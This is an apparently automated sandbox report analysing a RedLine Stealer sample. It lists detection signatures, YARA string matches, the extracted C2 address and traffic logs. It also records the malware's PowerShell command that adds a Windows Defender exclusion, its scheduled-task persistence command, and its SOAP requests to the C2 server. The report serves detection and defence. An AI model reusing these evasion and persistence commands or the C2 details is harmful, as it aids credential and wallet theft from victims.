Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nzLoHpgAln.exe

Overview

General Information

Sample name:nzLoHpgAln.exe
renamed because original name is a hash value
Original sample name:9f417a8434a3ea2932b0a23ebae7e7fa.exe
Analysis ID:1583001
MD5:9f417a8434a3ea2932b0a23ebae7e7fa
SHA1:fcf9b06b8bbd53e0b230c04a99bcc4c8f3bcec2f
SHA256:9632b0c0e242cef53b06a4e52dd154620184dded677e0a11be162278d8352b4e
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • nzLoHpgAln.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)
    • powershell.exe (PID: 6660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7472 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nzLoHpgAln.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wZWwzQVEakJvEU.exe (PID: 7408 cmdline: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)
    • schtasks.exe (PID: 7680 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wZWwzQVEakJvEU.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.57.76:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x13b5a:$a4: get_ScannedWallets
          • 0x129b8:$a5: get_ScanTelegram
          • 0x137de:$a6: get_ScanGeckoBrowsersPaths
          • 0x115fa:$a7: <Processes>k__BackingField
          • 0xf50c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x10f2e:$a9: <ScanFTP>k__BackingField
          00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 20 entries
              SourceRuleDescriptionAuthorStrings
              10.2.wZWwzQVEakJvEU.exe.4435590.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                10.2.wZWwzQVEakJvEU.exe.4435590.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  10.2.wZWwzQVEakJvEU.exe.4435590.3.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  10.2.wZWwzQVEakJvEU.exe.4435590.3.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0xfbcb:$gen01: ChromeGetRoamingName
                  • 0xfbff:$gen02: ChromeGetLocalName
                  • 0xfc28:$gen03: get_UserDomainName
                  • 0x11e67:$gen04: get_encrypted_key
                  • 0x113e3:$gen05: browserPaths
                  • 0x1172b:$gen06: GetBrowsers
                  • 0x11061:$gen07: get_InstalledInputLanguages
                  • 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x7318:$spe6: windows-1251, CommandLine:
                  • 0x125bd:$spe9: *wallet*
                  • 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                  • 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                  • 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                  • 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  10.2.wZWwzQVEakJvEU.exe.4435590.3.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  Click to see the 40 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", ProcessId: 6660, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", ProcessId: 6660, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe, ParentImage: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe, ParentProcessId: 7408, ParentProcessName: wZWwzQVEakJvEU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", ProcessId: 7680, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", ProcessId: 4296, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", ProcessId: 6660, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", ProcessId: 4296, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:10.718870+010020450001Malware Command and Control Activity Detected185.222.57.7655615192.168.2.449736TCP
                  2025-01-01T12:32:20.107021+010020450001Malware Command and Control Activity Detected185.222.57.7655615192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:13.487839+010020460561A Network Trojan was detected185.222.57.7655615192.168.2.449736TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:13.487839+010020450011Malware Command and Control Activity Detected185.222.57.7655615192.168.2.449736TCP
                  2025-01-01T12:32:23.023775+010020450011Malware Command and Control Activity Detected185.222.57.7655615192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:05.708973+010028496621Malware Command and Control Activity Detected192.168.2.449736185.222.57.7655615TCP
                  2025-01-01T12:32:14.896477+010028496621Malware Command and Control Activity Detected192.168.2.449739185.222.57.7655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:10.927753+010028493511Malware Command and Control Activity Detected192.168.2.449736185.222.57.7655615TCP
                  2025-01-01T12:32:20.318381+010028493511Malware Command and Control Activity Detected192.168.2.449739185.222.57.7655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:15.419091+010028482001Malware Command and Control Activity Detected192.168.2.449741185.222.57.7655615TCP
                  2025-01-01T12:32:24.903101+010028482001Malware Command and Control Activity Detected192.168.2.449749185.222.57.7655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:13.891111+010028493521Malware Command and Control Activity Detected192.168.2.449738185.222.57.7655615TCP
                  2025-01-01T12:32:23.435176+010028493521Malware Command and Control Activity Detected192.168.2.449748185.222.57.7655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T12:32:05.708973+010018000001Malware Command and Control Activity Detected192.168.2.449736185.222.57.7655615TCP
                  2025-01-01T12:32:14.896477+010018000001Malware Command and Control Activity Detected192.168.2.449739185.222.57.7655615TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.57.76:55615"], "Bot Id": "cheat"}
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeReversingLabs: Detection: 63%
                  Source: nzLoHpgAln.exeReversingLabs: Detection: 63%
                  Source: nzLoHpgAln.exeVirustotal: Detection: 56%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: nzLoHpgAln.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeUnpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack
                  Source: nzLoHpgAln.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: nzLoHpgAln.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_048FD088
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_048FAF2C
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 4x nop then jmp 09F4ABF9h0_2_09F4AE83
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 4x nop then jmp 0A049F11h10_2_0A04A19B

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49736 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49736 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49739 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49739 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49738 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49741 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.76:55615 -> 192.168.2.4:49736
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49736 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.76:55615 -> 192.168.2.4:49736
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.76:55615 -> 192.168.2.4:49736
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49748 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.76:55615 -> 192.168.2.4:49739
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49739 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49749 -> 185.222.57.76:55615
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.76:55615 -> 192.168.2.4:49739
                  Source: Malware configuration extractorURLs: 185.222.57.76:55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                  Source: global trafficTCP traffic: 192.168.2.4:49736 -> 185.222.57.76:55615
                  Source: global trafficTCP traffic: 192.168.2.4:61325 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.76:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.76:55615Content-Length: 953964Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.76:55615Content-Length: 953956Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.76:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.76:55615Content-Length: 953783Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.76:55615Content-Length: 953775Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
